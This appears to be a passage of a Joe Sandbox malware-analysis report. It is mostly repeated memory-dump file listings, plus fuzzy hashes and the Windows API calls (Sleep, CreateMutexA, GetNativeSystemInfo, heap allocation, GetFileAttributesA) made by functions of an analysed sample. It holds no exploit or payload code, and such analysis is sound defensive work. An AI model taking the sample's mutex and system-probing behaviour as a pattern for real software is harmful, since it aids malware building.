Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5805399fe646bdcb6a36a6038ed2449e02d387bf0086f25ccf0314580a949281
Instruction ID: fe8995b6648f75c9f80073e63fdbb34336efc9d61500e5dcdf7f6d62c15b5bbd
Opcode Fuzzy Hash: 5805399fe646bdcb6a36a6038ed2449e02d387bf0086f25ccf0314580a949281
Instruction Fuzzy Hash: E12137326042049BEB18AB6CECC5B2CF762EBC1310F248219E51CD73E5EB7599908B36

Function 00D7A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 8d1abbe4e106e548b252ba4c65442c3cee355d8884c9ab85b2fa167548039acd
Instruction ID: f3b06c24ead44d37b3c42b6f93f0ede5b3f2988e114239c4d79d58590cbbb13f
Opcode Fuzzy Hash: 8d1abbe4e106e548b252ba4c65442c3cee355d8884c9ab85b2fa167548039acd
Instruction Fuzzy Hash: E6213731649201DAFB28677C9C86B6DB752DFC1300F28881AE54CD63D1EB7A898096B3

Function 00D7A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: fe8d26ef2048c68f0b19aa8fc95a1c664dbdb688885de3f31831a58d9cc54a8d
Instruction ID: 2f3059e004bc8140b7b648d1e748bb3a97ece9b87899b8f81837d138ff67fc28
Opcode Fuzzy Hash: fe8d26ef2048c68f0b19aa8fc95a1c664dbdb688885de3f31831a58d9cc54a8d
Instruction Fuzzy Hash: D72149316042049BEB189F6CEC8576CFB62EFC1314F248219E50CD77D4EB7699908776

Function 00D77D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D77ED3

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: c71365cce29d08de47a884cd902f85c6e8c779949d33e7d0c2a6b99ff1b3799e
Instruction ID: da41de0a24ceadcef6f8eaeb64de70257af0300c0b0c53a4d7e2997fffba9c31
Opcode Fuzzy Hash: c71365cce29d08de47a884cd902f85c6e8c779949d33e7d0c2a6b99ff1b3799e
Instruction Fuzzy Hash: EBE1F870E002449BDB15BB28DD5B3AD7761EB41720F948699E41DA73C2EB748E848BF3

Function 00DAD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DAA813,00000001,00000364,00000006,000000FF,?,00DAEE3F,?,00000004,00000000,?,?), ref: 00DAD871

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 47c2b6efb070d91e7ee2b9e583393eb47926628428f9e05b5d3c2b9346ee5ec2
Instruction ID: c81b4212e620c82f53c361d6031ac3661e0cbe021fc906fe182e605264d7ac39
Opcode Fuzzy Hash: 47c2b6efb070d91e7ee2b9e583393eb47926628428f9e05b5d3c2b9346ee5ec2
Instruction Fuzzy Hash: 4DF02E3150122466DF212B769C01A5B775BDF473B0B1C8021FC06D7981DB38DC00D1F0

Function 00D787B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00D7DA1D,?,?,?,?), ref: 00D787B9

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
